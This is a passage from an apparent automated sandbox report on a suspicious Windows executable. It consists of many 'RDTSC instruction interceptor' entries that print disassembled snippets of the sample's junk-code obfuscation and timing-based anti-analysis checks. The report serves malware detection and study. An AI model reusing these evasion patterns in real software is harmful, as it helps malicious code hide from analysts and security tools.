0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov edi, dword ptr [ebp+122D3D12h] 0x0000005d sub esi, 04C4801Bh 0x00000063 mov dword ptr [ebp+122D1861h], edi 0x00000069 xchg eax, ebx 0x0000006a pushad 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e pop edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C8FB8 second address: 9C8FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C92C2 second address: 9C92C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C92C6 second address: 9C92CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9C9AFD second address: 9C9B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CA55D second address: 9CA562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB154 second address: 9CB158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CA562 second address: 9CA577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9DF58A6BDBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CA577 second address: 9CA57D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB5B9 second address: 9CB5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CC6DE second address: 9CC77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF4F36022h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F9DF4F36018h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007F9DF4F36024h 0x0000002a push 00000000h 0x0000002c jl 00007F9DF4F3601Ch 0x00000032 mov ebx, dword ptr [ebp+122D3D96h] 0x00000038 or dword ptr [ebp+122D3037h], esi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F9DF4F36018h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a mov bx, dx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 jmp 00007F9DF4F36027h 0x00000066 pop eax 0x00000067 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB934 second address: 9CB93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB93A second address: 9CB955 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9DF4F3601Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F9DF4F36024h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CB955 second address: 9CB959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CD740 second address: 9CD745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CD745 second address: 9CD789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9DF58A6BDDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e cmc 0x0000000f push 00000000h 0x00000011 mov di, BF3Bh 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+1246B63Bh], eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F9DF58A6BE4h 0x00000026 je 00007F9DF58A6BD6h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CC96A second address: 9CC96F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE6C9 second address: 9CE6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE6D2 second address: 9CE6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE6D6 second address: 9CE719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D3BCEh] 0x00000010 push 00000000h 0x00000012 movzx ebx, di 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F9DF58A6BD8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov di, 7991h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edi 0x0000003a pop edi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE719 second address: 9CE71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CE71E second address: 9CE729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9DF58A6BD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9CD8FE second address: 9CD923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jng 00007F9DF4F3601Ch 0x00000011 jg 00007F9DF4F36016h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D0964 second address: 9D0968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D0968 second address: 9D096E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D197F second address: 9D1983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D1983 second address: 9D198C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D294A second address: 9D294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D294E second address: 9D2958 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D2A90 second address: 9D2AA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F9DF58A6BDCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D6DB0 second address: 9D6E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF4F36029h 0x00000008 jnl 00007F9DF4F36016h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F9DF4F36021h 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F9DF4F36018h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 sub dword ptr [ebp+124530BBh], esi 0x00000038 push 00000000h 0x0000003a mov ebx, ecx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F9DF4F36018h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Dh 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 mov bx, A690h 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D6E44 second address: 9D6E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F9DF58A6BDCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D6E51 second address: 9D6E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 js 00007F9DF4F36016h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D60D3 second address: 9D60D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D8D0E second address: 9D8D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F70 second address: 9D7F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F74 second address: 9D7F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F82 second address: 9D7F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F86 second address: 9D7F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F8C second address: 9D7F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D7F92 second address: 9D7F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D9E8C second address: 9D9E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9DBD4D second address: 9DBD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9DBD51 second address: 9DBD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9D9F5A second address: 9D9F6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F9DF4F36016h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9DBD57 second address: 9DBD5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9DAE9B second address: 9DAEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9DAEA7 second address: 9DAECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F9DF58A6BD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9DBEE9 second address: 9DBF16 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9DF4F3602Eh 0x00000008 jmp 00007F9DF4F36028h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jnp 00007F9DF4F3602Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9DBF16 second address: 9DBF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E5EB9 second address: 9E5EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9DF4F36016h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E5EC4 second address: 9E5EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9DF58A6BD6h 0x00000009 jnp 00007F9DF58A6BD6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 983136 second address: 98313A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E56E2 second address: 9E56E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E56E6 second address: 9E56FC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9DF4F36016h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F9DF4F3601Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E58A1 second address: 9E58A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E58A5 second address: 9E58A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E58A9 second address: 9E58AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E58AF second address: 9E58D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36025h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F9DF4F36018h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9E5A2B second address: 9E5A54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F9DF58A6BE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BDFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EACAE second address: 9EACE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edi 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jg 00007F9DF4F36018h 0x0000001a jmp 00007F9DF4F3601Ch 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edi 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 pop edi 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f pushad 0x00000030 popad 0x00000031 pop eax 0x00000032 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EAD88 second address: 9EAD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EAD8C second address: 9EAD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EAD90 second address: 9EADE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F9DF58A6BD6h 0x0000000d jmp 00007F9DF58A6BE9h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push ecx 0x00000016 jno 00007F9DF58A6BDCh 0x0000001c jno 00007F9DF58A6BD6h 0x00000022 pop ecx 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a jmp 00007F9DF58A6BE7h 0x0000002f pop eax 0x00000030 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EADE6 second address: 9EAE28 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9DF4F36018h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jng 00007F9DF4F36027h 0x00000014 jnp 00007F9DF4F36021h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F9DF4F36026h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EAF98 second address: 9EAF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EAF9C second address: 9EAFA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9EAFA0 second address: 9EAFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a jne 00007F9DF58A6BD8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F01BB second address: 9F01CA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9DF4F36016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F01CA second address: 9F01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007F9DF58A6BF1h 0x0000000d jmp 00007F9DF58A6BE5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F034E second address: 9F0352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0785 second address: 9F078A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0A87 second address: 9F0AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9DF4F36016h 0x00000009 jmp 00007F9DF4F36021h 0x0000000e jmp 00007F9DF4F36027h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F9DF4F36016h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0AC3 second address: 9F0AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0BFB second address: 9F0C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jbe 00007F9DF4F36016h 0x0000000c jmp 00007F9DF4F36023h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0C1B second address: 9F0C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F9DF58A6BD6h 0x0000000a jbe 00007F9DF58A6BD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0C2B second address: 9F0C4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F9DF4F36016h 0x00000008 jnc 00007F9DF4F36016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF4F3601Ah 0x00000017 je 00007F9DF4F36016h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0C4D second address: 9F0C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F0C51 second address: 9F0C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F919D second address: 9F91A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F98CF second address: 9F98D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F98D4 second address: 9F98FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F9DF58A6BE3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F9DF58A6BE4h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9F98FC second address: 9F9900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FA303 second address: 9FA309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 9FA309 second address: 9FA30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
